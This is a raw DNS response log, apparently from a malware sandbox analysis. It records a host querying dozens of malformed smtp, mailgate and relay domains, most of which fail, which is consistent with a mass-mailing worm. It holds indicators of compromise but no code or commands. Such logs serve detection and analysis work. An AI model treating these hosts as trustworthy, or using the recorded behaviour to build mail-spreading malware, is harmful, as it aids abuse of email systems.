Nov 30, 2023 11:22:48.603630066 CET	1.1.1.1	192.168.2.4	0xd916	Name error (3)	relay.klp.tn	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.612612963 CET	1.1.1.1	192.168.2.4	0x3d9f	Name error (3)	relay.m0bhfhblezlsl1.co.tv	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.612623930 CET	1.1.1.1	192.168.2.4	0x3d9f	Name error (3)	relay.m0bhfhblezlsl1.co.tv	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.614085913 CET	1.1.1.1	192.168.2.4	0x9a72	Name error (3)	smtp.fldie12.jdgwcollfaaba.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.620186090 CET	1.1.1.1	192.168.2.4	0xddd3	Name error (3)	smtp.h333ol03t8rwslive21lok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.624407053 CET	1.1.1.1	192.168.2.4	0x1f4e	Name error (3)	smtp.yahao.lsa	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.625966072 CET	1.1.1.1	192.168.2.4	0x2d1c	Name error (3)	smtp.sbcgloboo.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.630978107 CET	1.1.1.1	192.168.2.4	0x975b	Name error (3)	smtp.deptka7ffmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.633557081 CET	1.1.1.1	192.168.2.4	0x3b69	Name error (3)	smtp.gmdcblil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.646245003 CET	1.1.1.1	192.168.2.4	0x6ab7	Name error (3)	smtp.geu015naryo-uail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.692970991 CET	1.1.1.1	192.168.2.4	0x5ac2	Name error (3)	smtp.hgaarnlundejl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.743978024 CET	1.1.1.1	192.168.2.4	0x6772	Name error (3)	smtp.hl.comuk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.744646072 CET	1.1.1.1	192.168.2.4	0xda47	Name error (3)	smtp.ee.idbo	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.768054962 CET	1.1.1.1	192.168.2.4	0xd51	Name error (3)	relay.e.gr	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.768114090 CET	1.1.1.1	192.168.2.4	0xd51	Name error (3)	relay.e.gr	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.792197943 CET	1.1.1.1	192.168.2.4	0x8f65	Name error (3)	smtp.gmai76afmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.792422056 CET	1.1.1.1	192.168.2.4	0x4790	Name error (3)	smtp.yahio.comcm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.795598984 CET	1.1.1.1	192.168.2.4	0xbe1c	Name error (3)	smtp.qhlil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.808088064 CET	1.1.1.1	192.168.2.4	0xabb0	Name error (3)	smtp.gez542l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.854551077 CET	1.1.1.1	192.168.2.4	0x3008	Name error (3)	smtp.ser711a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.889897108 CET	1.1.1.1	192.168.2.4	0xcb80	Name error (3)	smtp.sbcglob4m.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.891575098 CET	1.1.1.1	192.168.2.4	0xb520	Name error (3)	smtp.yahe.nen	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.899100065 CET	1.1.1.1	192.168.2.4	0x2d7a	Name error (3)	smtp.as.r.upze	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.907186985 CET	1.1.1.1	192.168.2.4	0x3e7e	Name error (3)	smtp.sgt9o.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.909276962 CET	1.1.1.1	192.168.2.4	0xb8c0	Name error (3)	smtp.aomttdl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.910731077 CET	1.1.1.1	192.168.2.4	0x5cec	Name error (3)	smtp.ytcjmiil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.917941093 CET	1.1.1.1	192.168.2.4	0x3d1f	Name error (3)	smtp.ochcar.cin4g9tdamn.bagcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.927227974 CET	1.1.1.1	192.168.2.4	0xa6cb	Name error (3)	smtp.mn.ch	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.929604053 CET	1.1.1.1	192.168.2.4	0xf0d2	Name error (3)	smtp.m0bhfhblezlsl1.co.tv	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.929636955 CET	1.1.1.1	192.168.2.4	0xf0d2	Name error (3)	smtp.m0bhfhblezlsl1.co.tv	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.945199966 CET	1.1.1.1	192.168.2.4	0xfea2	Name error (3)	smtp.acooil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.960849047 CET	1.1.1.1	192.168.2.4	0xbcf9	Name error (3)	smtp.klp.tn	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.989600897 CET	1.1.1.1	192.168.2.4	0x9bd8	Name error (3)	smtp.buromaril.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.007699966 CET	1.1.1.1	192.168.2.4	0x394b	Name error (3)	smtp.gmaiuilil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.018623114 CET	1.1.1.1	192.168.2.4	0x1990	Server failure (2)	smtp.rknsieiwn.ail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.054179907 CET	1.1.1.1	192.168.2.4	0x394b	Name error (3)	smtp.gmaiuilil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.115539074 CET	1.1.1.1	192.168.2.4	0x14d6	Name error (3)	relay.mess.ck	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.122581959 CET	1.1.1.1	192.168.2.4	0x1990	Server failure (2)	smtp.rknsieiwn.ail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.125648022 CET	1.1.1.1	192.168.2.4	0x7be2	Name error (3)	smtp.tbsayail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.133495092 CET	1.1.1.1	192.168.2.4	0xbe6f	Name error (3)	smtp.rambojoocta.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.134196997 CET	1.1.1.1	192.168.2.4	0xc3	Name error (3)	smtp.mess.ck	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.134272099 CET	1.1.1.1	192.168.2.4	0xc3	Name error (3)	smtp.mess.ck	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.134285927 CET	1.1.1.1	192.168.2.4	0x7ac6	Name error (3)	smtp.yah23051987hont.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.171056032 CET	1.1.1.1	192.168.2.4	0x79d7	Name error (3)	pop.z-a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.187258959 CET	1.1.1.1	192.168.2.4	0x14d6	Name error (3)	relay.mess.ck	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.189130068 CET	1.1.1.1	192.168.2.4	0x8802	Name error (3)	mailgate.yahjl.cxs	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.195183992 CET	1.1.1.1	192.168.2.4	0xcb7c	Name error (3)	smtp.tload.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.200062037 CET	1.1.1.1	192.168.2.4	0x5e68	Name error (3)	mailgate.yah23051987hont.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.219402075 CET	1.1.1.1	192.168.2.4	0x9209	Server failure (2)	smtp.h4y.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.251583099 CET	1.1.1.1	192.168.2.4	0x7370	Name error (3)	relay.1rz.ramal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.251621008 CET	1.1.1.1	192.168.2.4	0x7370	Name error (3)	relay.1rz.ramal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.274807930 CET	1.1.1.1	192.168.2.4	0x1d02	Name error (3)	smtp.ez786-lcolwicn.coofmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.339446068 CET	1.1.1.1	192.168.2.4	0xfae1	Name error (3)	smtp.e.gr	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.402988911 CET	1.1.1.1	192.168.2.4	0xfae1	Name error (3)	smtp.e.gr	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.403588057 CET	1.1.1.1	192.168.2.4	0x1d02	Name error (3)	smtp.ez786-lcolwicn.coofmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.431140900 CET	1.1.1.1	192.168.2.4	0x7dd4	Name error (3)	mailgate.z-a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.435061932 CET	1.1.1.1	192.168.2.4	0x8c4f	Name error (3)	relay.getococuail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.436870098 CET	1.1.1.1	192.168.2.4	0xff39	Name error (3)	smtp.1rz.ramal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.436877012 CET	1.1.1.1	192.168.2.4	0xff39	Name error (3)	smtp.1rz.ramal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.482608080 CET	1.1.1.1	192.168.2.4	0x3b63	Name error (3)	mailgate.comcaci.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.502943993 CET	1.1.1.1	192.168.2.4	0x8697	Name error (3)	mailgate.yahcl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.527308941 CET	1.1.1.1	192.168.2.4	0x67dc	Name error (3)	relay.gtblil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.536350012 CET	1.1.1.1	192.168.2.4	0xe282	Name error (3)	relay.a0i.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.536356926 CET	1.1.1.1	192.168.2.4	0xe282	Name error (3)	relay.a0i.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.550179958 CET	1.1.1.1	192.168.2.4	0xcd00	Name error (3)	relay.hotmea1aia.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.754364014 CET	1.1.1.1	192.168.2.4	0xb4cc	Name error (3)	smtp.a0i.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.754439116 CET	1.1.1.1	192.168.2.4	0xb4cc	Name error (3)	smtp.a0i.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.783246994 CET	1.1.1.1	192.168.2.4	0x9ede	Name error (3)	mailgate.zma51baya.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.984235048 CET	1.1.1.1	192.168.2.4	0x3f7	Name error (3)	mailgate.gmaigcmar19l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:50.326638937 CET	1.1.1.1	192.168.2.4	0x299	Name error (3)	mailgate.loaquorezcil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:50.332695961 CET	1.1.1.1	192.168.2.4	0xb78	Name error (3)	relay.phcg87k6barre352odseba.dcivenail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:50.334845066 CET	1.1.1.1	192.168.2.4	0x22c5	Name error (3)	mailgate.asgmaanxgdil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:50.341151953 CET	1.1.1.1	192.168.2.4	0x4f22	Name error (3)	mailgate.yahgr.neaco	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:50.351247072 CET	1.1.1.1	192.168.2.4	0x5da7	Name error (3)	mailgate.phcg87k6barre352odseba.dcivenail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:50.426665068 CET	1.1.1.1	192.168.2.4	0x2e16	Name error (3)	relay.tbsayail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:50.464981079 CET	1.1.1.1	192.168.2.4	0x90f6	Name error (3)	mailgate.as.hauet	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:50.556190014 CET	1.1.1.1	192.168.2.4	0xcdab	Name error (3)	pop3.z-a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:50.562102079 CET	1.1.1.1	192.168.2.4	0x4e68	Name error (3)	mailgate.comcaio.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:50.731185913 CET	1.1.1.1	192.168.2.4	0x500e	Name error (3)	mailgate.daytonpubhocso.cog	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:50.797019958 CET	1.1.1.1	192.168.2.4	0xe9d9	Name error (3)	mailgate.cucumbnr.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:50.885967970 CET	1.1.1.1	192.168.2.4	0x8d46	Name error (3)	mailgate.kni.ol168.ecom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.028408051 CET	1.1.1.1	192.168.2.4	0x8058	Name error (3)	mailgate.hot13l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.028889894 CET	1.1.1.1	192.168.2.4	0x9498	Name error (3)	mailgate.osrniamadvea.lrhzda.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.044732094 CET	1.1.1.1	192.168.2.4	0x7dc1	Name error (3)	mailgate.domo5ho.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.103188992 CET	1.1.1.1	192.168.2.4	0xf591	Name error (3)	mailgate.jubo.cath	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.105582952 CET	1.1.1.1	192.168.2.4	0x8781	Name error (3)	mailgate.wn26lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.148418903 CET	1.1.1.1	192.168.2.4	0x363	Name error (3)	mailgate.hotmea1aia.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.153364897 CET	1.1.1.1	192.168.2.4	0x2c38	Name error (3)	mailgate.yahpn.yb	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.167969942 CET	1.1.1.1	192.168.2.4	0x6881	Name error (3)	mailgate.caatholiomissa.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.260519981 CET	1.1.1.1	192.168.2.4	0x9ede	Name error (3)	mailgate.n.n.amdiu	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.261840105 CET	1.1.1.1	192.168.2.4	0xdb6a	Name error (3)	mailgate.yahnt.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.262080908 CET	1.1.1.1	192.168.2.4	0xd6e2	Name error (3)	mailgate.h2.spainvil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.262773037 CET	1.1.1.1	192.168.2.4	0x996b	Name error (3)	mailgate.acesineuiw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.263755083 CET	1.1.1.1	192.168.2.4	0x2ea0	Name error (3)	mailgate.oa.lagdfillemlmlml00xydurail.jkeziac.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.265579939 CET	1.1.1.1	192.168.2.4	0xba8	Name error (3)	mailgate.wr.omt222lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.271054029 CET	1.1.1.1	192.168.2.4	0xdf68	Name error (3)	mailgate.yahgt.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.275397062 CET	1.1.1.1	192.168.2.4	0x9e60	Name error (3)	mailgate.asail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.289158106 CET	1.1.1.1	192.168.2.4	0x2e24	Name error (3)	mailgate.23xd5a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.330224037 CET	1.1.1.1	192.168.2.4	0x7915	Name error (3)	mailgate.t-yil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.333899021 CET	1.1.1.1	192.168.2.4	0x4cf1	Name error (3)	mailgate.ayls.xcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.335858107 CET	1.1.1.1	192.168.2.4	0xf596	Name error (3)	mailgate.t.ahlfth	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.380001068 CET	1.1.1.1	192.168.2.4	0x71a2	Name error (3)	mailgate.ho10a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.421288013 CET	1.1.1.1	192.168.2.4	0x4df9	No error (0)	aqh.net			MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:51.434920073 CET	1.1.1.1	192.168.2.4	0x4df9	No error (0)	aqh.net			MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:51.439218998 CET	1.1.1.1	192.168.2.4	0x9040	Name error (3)	mailgate.lyco2.comom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.442476034 CET	1.1.1.1	192.168.2.4	0x1b60	Name error (3)	mailgate.geu015naryo-uail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.443852901 CET	1.1.1.1	192.168.2.4	0x8f28	Name error (3)	mailgate.hl.comuk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.445509911 CET	1.1.1.1	192.168.2.4	0x66bf	Name error (3)	mailgate.qebyte.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.446721077 CET	1.1.1.1	192.168.2.4	0x53e4	Name error (3)	mailgate.feoio.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.459664106 CET	1.1.1.1	192.168.2.4	0x7f67	Name error (3)	mailgate.fldie12.jdgwcollfaaba.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.461884975 CET	1.1.1.1	192.168.2.4	0x90a0	Name error (3)	mailgate.s.ddo	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.466016054 CET	1.1.1.1	192.168.2.4	0xb151	Name error (3)	mailgate.yahwoooie2ampu.comsh	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.501636028 CET	1.1.1.1	192.168.2.4	0x71a2	Name error (3)	mailgate.ho10a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.509408951 CET	1.1.1.1	192.168.2.4	0x75ef	Name error (3)	mailgate.horadguc1995l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.509893894 CET	1.1.1.1	192.168.2.4	0xa1f5	Name error (3)	mailgate.f.nyhm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.515144110 CET	1.1.1.1	192.168.2.4	0xee4	Name error (3)	mailgate.sbcgloboo.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.516168118 CET	1.1.1.1	192.168.2.4	0xf092	Name error (3)	mailgate.pyctl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.517082930 CET	1.1.1.1	192.168.2.4	0x54c0	Name error (3)	mailgate.nnblmogblmoglil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.526312113 CET	1.1.1.1	192.168.2.4	0x86c8	Name error (3)	mailgate.il.om	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.530332088 CET	1.1.1.1	192.168.2.4	0x7092	Name error (3)	mailgate.klp.tn	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.531833887 CET	1.1.1.1	192.168.2.4	0x5559	Name error (3)	mailgate.gez542l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.538103104 CET	1.1.1.1	192.168.2.4	0x36c2	Name error (3)	mailgate.gmdcblil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.549458981 CET	1.1.1.1	192.168.2.4	0xa2c	No error (0)	aqh.net		103.224.182.246	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.585326910 CET	1.1.1.1	192.168.2.4	0x7db9	Name error (3)	mailgate.gbivlporollm.cz	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.744687080 CET	1.1.1.1	192.168.2.4	0x59e0	Name error (3)	mailgate.yahe.nen	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.747093916 CET	1.1.1.1	192.168.2.4	0xb5a3	Name error (3)	mailgate.slyvor.as290a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.750598907 CET	1.1.1.1	192.168.2.4	0x2575	Name error (3)	mailgate.qhlil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.760597944 CET	1.1.1.1	192.168.2.4	0x927e	Name error (3)	mailgate.yahao.lsa	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.761600971 CET	1.1.1.1	192.168.2.4	0xcba5	Name error (3)	mailgate.comcamm.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.800735950 CET	1.1.1.1	192.168.2.4	0xb4b6	Name error (3)	mailgate.ee.idbo	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.850996971 CET	1.1.1.1	192.168.2.4	0x13c9	No error (0)	ftp.hul.co.uk		68.183.34.12	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.852734089 CET	1.1.1.1	192.168.2.4	0xb65b	Name error (3)	mailgate.rhacmtu.au	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.862874031 CET	1.1.1.1	192.168.2.4	0x2575	Name error (3)	mailgate.qhlil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.105982065 CET	1.1.1.1	192.168.2.4	0x59e0	Name error (3)	mailgate.yahe.nen	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.106549025 CET	1.1.1.1	192.168.2.4	0x3f4c	Name error (3)	mailgate.acooil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.128751993 CET	1.1.1.1	192.168.2.4	0xe24f	Name error (3)	mailgate.gmai76afmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.147511959 CET	1.1.1.1	192.168.2.4	0x9435	Name error (3)	mailgate.h333ol03t8rwslive21lok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.179253101 CET	1.1.1.1	192.168.2.4	0x2d9b	Name error (3)	mailgate.buromaril.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.180486917 CET	1.1.1.1	192.168.2.4	0x142a	Name error (3)	mailgate.deptka7ffmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.182323933 CET	1.1.1.1	192.168.2.4	0xdc39	No error (0)	park-mx.above.com		103.224.212.34	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.203775883 CET	1.1.1.1	192.168.2.4	0x1c7f	Name error (3)	mailgate.syn.lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.229969025 CET	1.1.1.1	192.168.2.4	0x6b6	Name error (3)	mailgate.m0bhfhblezlsl1.co.tv	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.231803894 CET	1.1.1.1	192.168.2.4	0xd661	Name error (3)	mailgate.7.dceilil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.337574959 CET	1.1.1.1	192.168.2.4	0x1ef1	Server failure (2)	mailgate.rknsieiwn.ail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.611413956 CET	1.1.1.1	192.168.2.4	0x3f4c	Name error (3)	mailgate.acooil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.612051964 CET	1.1.1.1	192.168.2.4	0xe24f	Name error (3)	mailgate.gmai76afmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.621155977 CET	1.1.1.1	192.168.2.4	0xa5ed	Name error (3)	mailgate.ser711a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.621802092 CET	1.1.1.1	192.168.2.4	0x3ce3	Name error (3)	mailgate.mn.ch	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.623368979 CET	1.1.1.1	192.168.2.4	0x9e0b	Name error (3)	mailgate.e-fja8mso.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.625159025 CET	1.1.1.1	192.168.2.4	0x5b84	Name error (3)	mailgate.yahfll.ianus	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.629828930 CET	1.1.1.1	192.168.2.4	0xe7ee	Name error (3)	mailgate.sbcglob4m.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.633358002 CET	1.1.1.1	192.168.2.4	0xe088	Name error (3)	relay.yahgr.neaco	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.702501059 CET	1.1.1.1	192.168.2.4	0x1a20	Name error (3)	mailgate.gtblil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.713788033 CET	1.1.1.1	192.168.2.4	0x47eb	Name error (3)	mailgate.1rz.ramal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.713820934 CET	1.1.1.1	192.168.2.4	0x47eb	Name error (3)	mailgate.1rz.ramal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.718395948 CET	1.1.1.1	192.168.2.4	0x4f55	Name error (3)	mailgate.tbsayail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.731178999 CET	1.1.1.1	192.168.2.4	0xb93e	Name error (3)	mailgate.ezi.adompany.at	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.833281040 CET	1.1.1.1	192.168.2.4	0xf1fa	Name error (3)	mailgate.mess.ck	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.074213982 CET	1.1.1.1	192.168.2.4	0xf1fa	Name error (3)	mailgate.mess.ck	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.079169989 CET	1.1.1.1	192.168.2.4	0xc041	Name error (3)	mailgate.ez786-lcolwicn.coofmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.252424002 CET	1.1.1.1	192.168.2.4	0x937f	Name error (3)	mailgate.he0114zusmg454lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.253739119 CET	1.1.1.1	192.168.2.4	0x46cd	Server failure (2)	mailgate.h4y.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.253776073 CET	1.1.1.1	192.168.2.4	0x5abb	Name error (3)	mailgate.ytcjmiil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.258749008 CET	1.1.1.1	192.168.2.4	0xf8ad	Name error (3)	rhic-boutique.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:53.433456898 CET	1.1.1.1	192.168.2.4	0x5e84	Name error (3)	mailgate.a.o.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.435301065 CET	1.1.1.1	192.168.2.4	0x767	Name error (3)	mailgate.hgaarnlundejl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.444178104 CET	1.1.1.1	192.168.2.4	0x8176	Name error (3)	smtp.gmaiuilil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.447479010 CET	1.1.1.1	192.168.2.4	0xea41	Name error (3)	mailgate.as.r.upze	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.483844042 CET	1.1.1.1	192.168.2.4	0xe47a	Name error (3)	mailgate.rambojoocta.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.554075956 CET	1.1.1.1	192.168.2.4	0x5ba1	Name error (3)	mailgate.ochcar.cin4g9tdamn.bagcom	none	none	A (IP address)	IN (0x0001)	false
